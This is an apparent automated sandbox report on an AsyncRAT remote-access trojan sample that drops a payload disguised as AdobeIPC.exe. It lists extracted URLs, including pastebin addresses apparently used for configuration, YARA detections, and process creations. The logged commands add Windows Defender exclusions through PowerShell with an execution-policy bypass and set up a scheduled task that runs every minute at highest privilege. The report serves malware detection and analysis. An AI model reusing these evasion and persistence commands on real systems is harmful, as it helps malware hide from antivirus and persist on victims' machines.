Source: Guna.UI2.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Guna.UI2.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Guna.UI2.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Guna.UI2.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Guna.UI2.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: powershell.exe, 00000004.00000002.1827533544.0000027F73003000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1920848773.00000299B4783000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2045023825.0000020C10073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2235942487.000001E2A1071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: Guna.UI2.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: Guna.UI2.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: Guna.UI2.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 0000000E.00000002.2106648780.000001E29122B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.1803790021.0000027F631B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1860426064.00000299A4939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1965120233.0000020C00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2106648780.000001E29122B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: AdobeIPC.exe, 00000002.00000002.2964085942.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1803790021.0000027F62F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1860426064.00000299A4711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1965120233.0000020C00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2106648780.000001E291001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1803790021.0000027F631B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1860426064.00000299A4939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1965120233.0000020C00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2106648780.000001E29122B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000E.00000002.2106648780.000001E29122B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: powershell.exe, 00000004.00000002.1834495488.0000027F7B862000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.Q
Source: Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 00000004.00000002.1803790021.0000027F62F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1860426064.00000299A4711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1965120233.0000020C00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2106648780.000001E291001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000E.00000002.2235942487.000001E2A1071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.2235942487.000001E2A1071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.2235942487.000001E2A1071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000E.00000002.2106648780.000001E29122B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: Stellar Generator.exe, 00000001.00000002.2967726546.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gunaframework.com/api/licensing.php
Source: Stellar Generator.exe, 00000001.00000002.2967726546.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gunaframework.com/api/licensing.phpLR
Source: Stellar Generator.exe, 00000001.00000002.2967726546.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gunaui.com/
Source: Stellar Generator.exe, 00000001.00000002.2967726546.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gunaui.com/LR
Source: Stellar Generator.exe, 00000001.00000002.2967726546.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gunaui.com/api/licensing.php
Source: Stellar Generator.exe, 00000001.00000002.2967726546.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gunaui.com/api/licensing.phpLR
Source: Stellar Generator.exe, 00000001.00000002.2967726546.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gunaui.com/pricing
Source: Stellar Generator.exe, 00000001.00000002.2967726546.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gunaui.com/pricingLR
Source: powershell.exe, 00000004.00000002.1827533544.0000027F73003000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1920848773.00000299B4783000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2045023825.0000020C10073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2235942487.000001E2A1071000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: AdobeIPC.exe, 00000002.00000002.2964085942.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
Source: Stellar Generator.exe, 00000001.00000000.1709947841.0000000000922000.00000002.00000001.01000000.00000006.sdmp, Stellar Generator.exe.0.dr	String found in binary or memory: https://pastebin.com/raw/LSuWhARfChttps://pastebin.com/raw/j4XYdsdHChttps://paste.fo/raw/9fc49c53951
Source: AdobeIPC, 00000016.00000002.2950830442.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/LsuynkUz

Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768

Source: unknown

HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49768 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: AdobeIPC.exe PID: 7364, type: MEMORYSTR

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\ProgramData\AdobeIPC.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.jcMcDQ11pZ.exe.2a341a0.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.jcMcDQ11pZ.exe.2a447e0.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.jcMcDQ11pZ.exe.2a447e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.jcMcDQ11pZ.exe.2a341a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.0.AdobeIPC.exe.af0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1714234137.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000000.1711447769.0000000000AF2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\ProgramData\AdobeIPC, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\ProgramData\AdobeIPC.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_0142D4FC	1_2_0142D4FC
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_05286D38	1_2_05286D38
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_0528A820	1_2_0528A820
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_05287260	1_2_05287260
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_05280007	1_2_05280007
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_0528A069	1_2_0528A069
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_0528A078	1_2_0528A078
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_05280040	1_2_05280040
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_0528A810	1_2_0528A810
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_0528CB6F	1_2_0528CB6F
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_0528CB99	1_2_0528CB99
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_0528D628	1_2_0528D628
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_05287250	1_2_05287250
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_05849194	1_2_05849194
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_05843CC0	1_2_05843CC0
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_05843CD0	1_2_05843CD0
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_05845750	1_2_05845750
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_05844688	1_2_05844688
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_0584BE60	1_2_0584BE60
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_0584467B	1_2_0584467B
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_0584494B	1_2_0584494B
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_05843BE4	1_2_05843BE4
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_072EF149	1_2_072EF149
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_072E28F0	1_2_072E28F0
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_072E276C	1_2_072E276C
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_072E27AC	1_2_072E27AC
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_072E33F0	1_2_072E33F0
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_072EA2A9	1_2_072EA2A9
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_072E3069	1_2_072E3069
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_072EB070	1_2_072EB070
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_072E3EE2	1_2_072E3EE2
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_072E3C1C	1_2_072E3C1C
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_072E3C4C	1_2_072E3C4C
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_07941FB8	1_2_07941FB8
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_07943514	1_2_07943514
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_07946320	1_2_07946320
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_0794669A	1_2_0794669A
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_0794668D	1_2_0794668D
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_079466FB	1_2_079466FB
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_07946610	1_2_07946610
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_07946620	1_2_07946620
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_07946676	1_2_07946676
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_07946310	1_2_07946310
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_07949A00	1_2_07949A00
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_079499F0	1_2_079499F0
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_0794689B	1_2_0794689B
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_0794F000	1_2_0794F000
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_079636E0	1_2_079636E0
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_079606E8	1_2_079606E8
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_07965610	1_2_07965610
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_07968B91	1_2_07968B91
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_07968BB0	1_2_07968BB0
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_07966FC0	1_2_07966FC0
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_07966F6E	1_2_07966F6E
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_079606D7	1_2_079606D7
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_079636D0	1_2_079636D0
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_07965600	1_2_07965600
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_079658D0	1_2_079658D0
Source: C:\ProgramData\Stellar Generator.exe	Code function: 1_2_079658C2	1_2_079658C2
Source: C:\ProgramData\AdobeIPC.exe	Code function: 2_2_00007FFD9B7F16A9	2_2_00007FFD9B7F16A9
Source: C:\ProgramData\AdobeIPC.exe	Code function: 2_2_00007FFD9B7F20CD	2_2_00007FFD9B7F20CD
Source: C:\ProgramData\AdobeIPC	Code function: 18_2_00007FFD9B7F0EFA	18_2_00007FFD9B7F0EFA
Source: C:\ProgramData\AdobeIPC	Code function: 18_2_00007FFD9B7F16A9	18_2_00007FFD9B7F16A9
Source: C:\ProgramData\AdobeIPC	Code function: 18_2_00007FFD9B7F20CD	18_2_00007FFD9B7F20CD
Source: C:\ProgramData\AdobeIPC.exe	Code function: 19_2_00007FFD9B7F0EFA	19_2_00007FFD9B7F0EFA
Source: C:\ProgramData\AdobeIPC.exe	Code function: 19_2_00007FFD9B7F16A9	19_2_00007FFD9B7F16A9
Source: C:\ProgramData\AdobeIPC.exe	Code function: 19_2_00007FFD9B7F20CD	19_2_00007FFD9B7F20CD
Source: C:\ProgramData\AdobeIPC.exe	Code function: 20_2_00007FFD9B7E0EFA	20_2_00007FFD9B7E0EFA
Source: C:\ProgramData\AdobeIPC.exe	Code function: 20_2_00007FFD9B7E16A9	20_2_00007FFD9B7E16A9
Source: C:\ProgramData\AdobeIPC.exe	Code function: 20_2_00007FFD9B7E20CD	20_2_00007FFD9B7E20CD
Source: C:\ProgramData\AdobeIPC	Code function: 22_2_00007FFD9B800EFA	22_2_00007FFD9B800EFA
Source: C:\ProgramData\AdobeIPC	Code function: 22_2_00007FFD9B8016A9	22_2_00007FFD9B8016A9
Source: C:\ProgramData\AdobeIPC	Code function: 22_2_00007FFD9B8020CD	22_2_00007FFD9B8020CD

Source: Joe Sandbox View

Dropped File: C:\ProgramData\Guna.UI2.dll E658E8A5616245DBE655E194B59F1BB704AAEAFBD0925D6EEBBE70555A638CDD

Source: jcMcDQ11pZ.exe, 00000000.00000002.1714234137.0000000002A01000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAdobeIPC.exe4 vs jcMcDQ11pZ.exe
Source: jcMcDQ11pZ.exe, 00000000.00000000.1704032480.00000000005DC000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameStellar.exe4 vs jcMcDQ11pZ.exe
Source: jcMcDQ11pZ.exe	Binary or memory string: OriginalFilenameStellar.exe4 vs jcMcDQ11pZ.exe

Source: jcMcDQ11pZ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.jcMcDQ11pZ.exe.2a341a0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.jcMcDQ11pZ.exe.2a447e0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.jcMcDQ11pZ.exe.2a447e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.jcMcDQ11pZ.exe.2a341a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.0.AdobeIPC.exe.af0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1714234137.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000000.1711447769.0000000000AF2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\ProgramData\AdobeIPC, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\ProgramData\AdobeIPC.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: jcMcDQ11pZ.exe, XxrMCzRlJKexMiGJO0rQe5.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: AdobeIPC.exe.0.dr, S8DvIln0iFJezbO2WvcZETMABEMYqaUNREr4HfdaFNpje6DXBKySAAJrQ4ni2qmNtnfSmwL.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: AdobeIPC.exe.0.dr, sdBBZUb8ihBfnvhHYXYv16FS7igqRtC1qMic9XBri8Xj2XQeIftSlA4GdJKPeIR60HkdmwU.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: AdobeIPC.exe.0.dr, sdBBZUb8ihBfnvhHYXYv16FS7igqRtC1qMic9XBri8Xj2XQeIftSlA4GdJKPeIR60HkdmwU.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.evad.winEXE@24/28@1/2

Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\jcMcDQ11pZ.exe.log

Jump to behavior

Source: C:\ProgramData\AdobeIPC	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
Source: C:\ProgramData\AdobeIPC.exe	Mutant created: \Sessions\1\BaseNamedObjects\X3pgFbVKpY4LNwye
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Mutant created: \Sessions\1\BaseNamedObjects\r9yVyTgJ5HiGuC4ZO
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4464:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7868:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03

Source: C:\ProgramData\AdobeIPC.exe

File created: C:\Users\user\AppData\Local\Temp\Log.tmp

Jump to behavior

Source: jcMcDQ11pZ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: jcMcDQ11pZ.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: jcMcDQ11pZ.exe	ReversingLabs: Detection: 71%
Source: jcMcDQ11pZ.exe	Virustotal: Detection: 75%

Source: Stellar Generator.exe

String found in binary or memory: !--StartFragment-->

Source: unknown	Process created: C:\Users\user\Desktop\jcMcDQ11pZ.exe "C:\Users\user\Desktop\jcMcDQ11pZ.exe"
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Process created: C:\ProgramData\Stellar Generator.exe "C:\ProgramData\Stellar Generator.exe"
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Process created: C:\ProgramData\AdobeIPC.exe "C:\ProgramData\AdobeIPC.exe"
Source: C:\ProgramData\AdobeIPC.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\AdobeIPC.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\AdobeIPC.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AdobeIPC.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\AdobeIPC.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\AdobeIPC'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\AdobeIPC.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AdobeIPC'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\AdobeIPC.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AdobeIPC" /tr "C:\ProgramData\AdobeIPC"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\AdobeIPC C:\ProgramData\AdobeIPC
Source: unknown	Process created: C:\ProgramData\AdobeIPC.exe "C:\ProgramData\AdobeIPC.exe"
Source: unknown	Process created: C:\ProgramData\AdobeIPC.exe "C:\ProgramData\AdobeIPC.exe"
Source: unknown	Process created: C:\ProgramData\AdobeIPC C:\ProgramData\AdobeIPC
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Process created: C:\ProgramData\Stellar Generator.exe "C:\ProgramData\Stellar Generator.exe"	Jump to behavior
Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe	Process created: C:\ProgramData\AdobeIPC.exe "C:\ProgramData\AdobeIPC.exe"	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\AdobeIPC.exe'	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AdobeIPC.exe'	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\AdobeIPC'	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AdobeIPC'	Jump to behavior
